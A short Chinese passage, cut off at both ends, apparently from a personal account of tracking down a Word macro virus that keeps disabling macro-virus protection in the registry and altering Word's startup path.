KB!事实上，我们没打开任何Word文档，Normal.dot又被删除了，哪来的病毒!?再一次打开注册表，发现EnableMacroVirusProtection又一次变成“0”!再细细检查注册表，发现STARTUP-PATH的键值由正常的C:Program FilesMicroso